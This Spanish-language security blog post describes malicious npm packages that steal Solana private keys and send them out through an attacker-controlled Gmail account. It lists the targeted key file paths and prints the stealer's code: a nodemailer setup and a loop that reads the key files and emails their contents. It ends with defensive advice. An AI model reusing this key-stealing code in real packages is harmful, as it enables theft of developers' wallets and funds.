Ataques en Solana: Paquetes npm Maliciosos que Roban Claves Privadas Usando Gmai

Diego Cortes R. lunes, enero 20, 2025Compartir:

El ecosistema de Solana ha sido recientemente blanco de una campaña maliciosa que utiliza paquetes npm comprometidos para robar claves privadas de desarrolladores. Esta amenaza, detectada por investigadores de seguridad, destaca por su capacidad para exfiltrar datos utilizando cuentas de Gmail, lo que dificulta su detección por herramientas de seguridad tradicionales.

El Vector de Ataque

Los atacantes publicaron versiones manipuladas de bibliotecas populares en el registro npm. Al instalar estas dependencias, los desarrolladores exponían sus dispositivos a un código malicioso que buscaba específicamente archivos sensibles relacionados con Solana, como claves privadas almacenadas en el sistema. Los archivos más comunes atacados son:

  • ~/.config/solana/id.json
  • ~/.config/solana/id2.json

Cómo Funciona el Código Malicioso

El código malicioso opera en varias etapas. A continuación, se explica su funcionamiento:

  1. Importación de Módulos Clave: Utiliza módulos como nodemailer (para enviar correos), os (para obtener información del sistema) y fs (para acceder al sistema de archivos), que son comunes en Node.js.

    const nodemailer = require('nodemailer');
    const os = require('os');
const fs = require('fs');

  2. Configuración del Envío de Correos: Configura un transporte de correo electrónico utilizando una cuenta de Gmail controlada por el atacante. Esto facilita el envío de los datos robados.

    const transporter = nodemailer.createTransport({
  service: 'gmail',
  auth: {
    user: '[email protected]',
    pass: 'password'
  }
});

  3. Exfiltración de Archivos Sensibles: El código busca y lee archivos que contienen claves privadas. Si encuentra estos archivos, envía su contenido a la cuenta de correo del atacante.


    filePaths.forEach((path) => {
  if (fs.existsSync(path)) {
    const fileContent = fs.readFileSync(path, 'utf8');
    const mailOptions = {
      from: '[email protected]',
      to: '[email protected]',
      subject: `Solana Key File from ${os.hostname()}`,
      text: fileContent
    };
    transporter.sendMail(mailOptions, (error, info) => {
      if (error) {
        console.log(`Error: ${error}`);
      } else {
        console.log(`Email sent: ${info.response}`);
      }
    });
  }
});

Por Qué Este Ataque es Difícil de Detectar

El uso de Gmail para la exfiltración aprovecha la confianza general en los servicios de Google. Muchas soluciones de seguridad no detectan el envío de datos maliciosos a través de Gmail porque se considera un servicio legítimo. Esto demuestra cómo los atacantes están evolucionando para explotar servicios conocidos de manera creativa.

Cómo Protegerse

Si eres desarrollador o trabajas en el ecosistema blockchain, especialmente con Solana, es fundamental seguir estas recomendaciones para minimizar el riesgo de ataques similares:

  1. Verificar las Dependencias: Antes de instalar un paquete npm, revisa su procedencia y reputación. Desconfía de versiones recientes con poca actividad en la comunidad.

  2. Monitorear los Permisos: Examina el código de las bibliotecas externas, especialmente si requieren acceso a tu sistema de archivos o datos sensibles.

  3. Mantener Actualizadas las Dependencias: Las actualizaciones frecuentes de los paquetes suelen incluir parches de seguridad que corrigen vulnerabilidades conocidas.

  4. Implementar Herramientas de Seguridad: Usa herramientas como Socket o Snyk que analicen las dependencias y detecten comportamientos maliciosos.

  5. Establecer Políticas de Seguridad en el Desarrollo: Adopta prácticas como el principio de privilegios mínimos, donde las dependencias tienen acceso solo a lo estrictamente necesario.

Conclusión

Este incidente es un claro recordatorio de los riesgos asociados con la cadena de suministro de software. Las aplicaciones blockchain como las desarrolladas en Solana son objetivos atractivos para los atacantes, y es esencial que los desarrolladores refuercen sus medidas de seguridad. Mantente alerta, audita tus dependencias y protege tus claves privadas para evitar ser víctima de estas sofisticadas campañas maliciosas.


Fuente: Gmail For Exfiltration: Malicious npm Packages Target Solana...

Si te gusta este contenido, no olvides seguirnos en nuestras redes sociales!:

Tags

Atención!: Hemos usado imagenes que nosotros hemos encontramos como libres, si detectas que alguna imagen te pertenece o consideras que estamos violando algún derecho de Autor avisanos inmediatamente al correo o por Inbox de Facebook y retiraremos la imagen inmediatamente. Solo adjuntanos el link. De ante mano muchas gracias!